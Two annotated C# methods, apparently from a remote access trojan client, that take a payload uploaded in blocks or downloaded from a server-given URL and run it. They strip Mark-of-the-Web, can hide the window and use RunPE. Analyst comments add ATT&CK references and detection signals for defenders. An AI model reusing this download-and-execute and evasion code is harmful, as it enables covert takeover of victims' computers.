Beispiel #1
        /// <summary>
        /// Handles one block of a server-initiated file transfer and, once the final block has
        /// been appended, runs the transferred payload in the way selected by <c>command.Type</c>.
        /// </summary>
        /// <remarks>
        /// Analyst notes (behaviour visible in this method only):
        /// - The destination is <c>command.FileName</c> combined with the ApplicationData folder.
        ///   No validation of the name is visible here.
        /// - Type "drop": the file is written, its <c>:Zone.Identifier</c> stream is passed to
        ///   DeleteFile, and the file is started with <see cref="Process.Start(ProcessStartInfo)"/>,
        ///   optionally with a hidden window.
        /// - Types "self" and "cmd": the bytes are Base64-encoded and passed to RunPE.Invoke, which
        ///   is defined elsewhere; the name and the commented-out RunPELib lines suggest in-memory
        ///   PE execution, not confirmed from this listing.
        /// - Every outcome is reported to the peer through a Status packet.
        /// Defensive signals that follow from the above: a process whose image lives under the
        /// user's AppData directory being started by this client, removal of a Zone.Identifier
        /// stream shortly before that start (compare ATT&amp;CK T1553.005), and hidden-window
        /// process creation (compare T1564.003).
        /// </remarks>
        /// <param name="command">Server packet carrying the file name, the current block and its
        /// index, the total block count, the execution type and the RunHidden flag.</param>
        /// <param name="client">Connection on which Status packets are sent back.</param>
        public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
        {
            // The file name comes from the remote packet. Path.Combine returns its second argument
            // unchanged when that argument is rooted, so the write location is not guaranteed to
            // stay under ApplicationData.
            string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                                           command.FileName);

            try
            {
                // Header check on the first block only. Because the two comparisons are joined with
                // &&, the block is rejected only when BOTH bytes differ from 'M' and 'Z'; this is a
                // loose check, not proof that the content is a PE file.
                if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
                {
                    throw new Exception("No executable file");
                }

                // MemorySplit is defined elsewhere; a new instance bound to filePath is created for
                // every incoming block.
                MemorySplit destFile = new MemorySplit(filePath);

                if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
                {
                    new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute(
                        client);
                    return;
                }

                // Only the last block (index MaxBlocks - 1) triggers execution; earlier blocks
                // return after being appended.
                if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
                {
                    if (command.Type == "drop")
                    {
                        if (!destFile.DropFile())
                        {
                            new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute(
                                client);
                            return;
                        }

                        // ":Zone.Identifier" is the NTFS alternate data stream Windows uses as the
                        // Mark-of-the-Web. DeleteFile is defined elsewhere; presumably it removes
                        // the stream, which would suppress origin-based warnings for this file.
                        DeleteFile(filePath + ":Zone.Identifier");

                        ProcessStartInfo startInfo = new ProcessStartInfo();
                        if (command.RunHidden)
                        {
                            startInfo.WindowStyle    = ProcessWindowStyle.Hidden;
                            startInfo.CreateNoWindow = true;
                        }
                        // UseShellExecute mirrors RunHidden: shell launch when hidden, direct
                        // process creation otherwise.
                        startInfo.UseShellExecute = command.RunHidden;
                        startInfo.FileName        = filePath;
                        Process.Start(startInfo);

                        new Packets.ClientPackets.Status("Executed File!").Execute(client);
                    }
                    else if (command.Type == "self")
                    {
                        byte[] dat = destFile.ToByteArray();
                        //File.WriteAllBytes("lol.exe", dat);
                        if (dat == null)
                        {
                            new Packets.ClientPackets.Status("Payload was null!").Execute(client);
                            return;
                        }
                        //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
                        //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } });

                        // Payload is handed over as Base64 text with the arguments "self" and "".
                        // NOTE(review): the meaning of these arguments is defined by RunPE, which
                        // is not shown; presumably they select the host process.
                        RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client);
                    }
                    else if (command.Type == "cmd")
                    {
                        byte[] dat = destFile.ToByteArray();
                        if (dat == null)
                        {
                            new Packets.ClientPackets.Status("Payload was null!").Execute(client);
                            return;
                        }
                        //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
                        //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } });
                        // Same hand-off as the "self" branch, with the arguments "sys" and "cmd".
                        RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client);
                    }
                    else
                    {
                        new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
                    }
                }
            }
            catch (Exception ex)
            {
                // Any failure removes the partially written file and reports the full exception
                // text (ex.ToString() includes the stack trace) to the peer.
                DeleteFile(filePath);
                new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client);
                //MessageBox.Show(ex.ToString());
            }
        }
Beispiel #2
        /// <summary>
        /// Fetches a payload from <c>command.URL</c> on a new thread and runs it in the way
        /// selected by <c>command.Type</c>, reporting progress to the peer with Status packets.
        /// </summary>
        /// <remarks>
        /// Analyst notes (behaviour visible in this method only):
        /// - Type "drop": the download is saved under the ApplicationData folder with a name from
        ///   Helper.GetRandomFilename(12, ".exe"), its <c>:Zone.Identifier</c> stream is passed to
        ///   DeleteFile, and the file is started, optionally with a hidden window.
        /// - Types "self" and "cmd": the bytes returned by Download are Base64-encoded and passed
        ///   to RunPE.Invoke (defined elsewhere; presumably in-memory PE execution, not confirmed
        ///   from this listing).
        /// - The WebClient has its proxy set to null, so the request does not go through a
        ///   configured system proxy. Proxy logs alone will not show this transfer; direct-egress
        ///   network telemetry will (compare ATT&amp;CK T1105).
        /// - The Status strings are not a reliable record of what ran: the final "Executed File!"
        ///   is sent after every branch that does not return, including the unknown-type branch.
        /// </remarks>
        /// <param name="command">Server packet carrying the URL, the execution type and the
        /// RunHidden flag.</param>
        /// <param name="client">Connection on which Status packets are sent back.</param>
        public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command,
                                                           Client client)
        {
            new Packets.ClientPackets.Status("Downloading file...").Execute(client);

            // All work happens on a separate thread, so this handler returns immediately.
            new Thread(() =>
            {
                try
                {
                    if (command.Type == "drop")
                    {
                        #region drop
                        // Target path: ApplicationData plus a generated ".exe" name.
                        // NOTE(review): GetRandomFilename is defined elsewhere; 12 is presumably
                        // the name length.
                        string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                                                       Helper.Helper.GetRandomFilename(12, ".exe"));

                        try
                        {
                            using (WebClient c = new WebClient())
                            {
                                // Proxy = null disables proxy use for this request.
                                c.Proxy = null;
                                c.DownloadFile(command.URL, tempFile);
                            }
                        }
                        catch
                        {
                            // Any download error is reduced to a fixed message; details are dropped.
                            new Packets.ClientPackets.Status("Download failed!").Execute(client);
                            return;
                        }

                        new Packets.ClientPackets.Status("Downloaded File!").Execute(client);

                        try
                        {
                            // ":Zone.Identifier" is the NTFS alternate data stream Windows uses as
                            // the Mark-of-the-Web. DeleteFile is defined elsewhere; presumably it
                            // removes the stream before the file is started.
                            DeleteFile(tempFile + ":Zone.Identifier");

                            // Header check after the file is already on disk. With && the file is
                            // rejected only when BOTH bytes differ from 'M' and 'Z'; a file shorter
                            // than two bytes throws on indexing and lands in the catch below.
                            var bytes = File.ReadAllBytes(tempFile);
                            if (bytes[0] != 'M' && bytes[1] != 'Z')
                            {
                                throw new Exception("Not an .EXE file!");
                            }

                            ProcessStartInfo startInfo = new ProcessStartInfo();
                            if (command.RunHidden)
                            {
                                startInfo.WindowStyle    = ProcessWindowStyle.Hidden;
                                startInfo.CreateNoWindow = true;
                            }
                            // UseShellExecute mirrors RunHidden: shell launch when hidden, direct
                            // process creation otherwise.
                            startInfo.UseShellExecute = command.RunHidden;
                            startInfo.FileName        = tempFile;
                            Process.Start(startInfo);
                        }
                        catch (Exception ex)
                        {
                            // On failure the downloaded file is deleted and only ex.Message is reported.
                            DeleteFile(tempFile);
                            new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
                            return;
                        }
                        #endregion
                    }
                    else if (command.Type == "self")
                    {
                        // Download is defined elsewhere; it is called with the URL and the client.
                        byte[] fileBytes = Download(command.URL, client);
                        if (fileBytes == null)
                        {
                            // NOTE(review): there is no return here, so a null result still reaches
                            // Convert.ToBase64String below, which throws; the outer catch then also
                            // sends an "Execution failed" status.
                            new Packets.ClientPackets.Status("Download failed!").Execute(client);
                        }

                        // Payload is handed over as Base64 text with the arguments "self" and "".
                        RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client);
                    }
                    else if (command.Type == "cmd")
                    {
                        byte[] fileBytes = Download(command.URL, client);
                        if (fileBytes == null)
                        {
                            // NOTE(review): same fall-through as in the "self" branch.
                            new Packets.ClientPackets.Status("Download failed!").Execute(client);
                        }

                        // Same hand-off as the "self" branch, with the arguments "sys" and "cmd".
                        RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client);
                    }
                    else
                    {
                        // No return here: the "Executed File!" status after the try block is still sent.
                        new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
                    }
                }
                catch (Exception ex)
                {
                    new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
                    return;
                }
                // Reached by every path that neither returned nor threw.
                new Packets.ClientPackets.Status("Executed File!").Execute(client);
            }).Start();
        }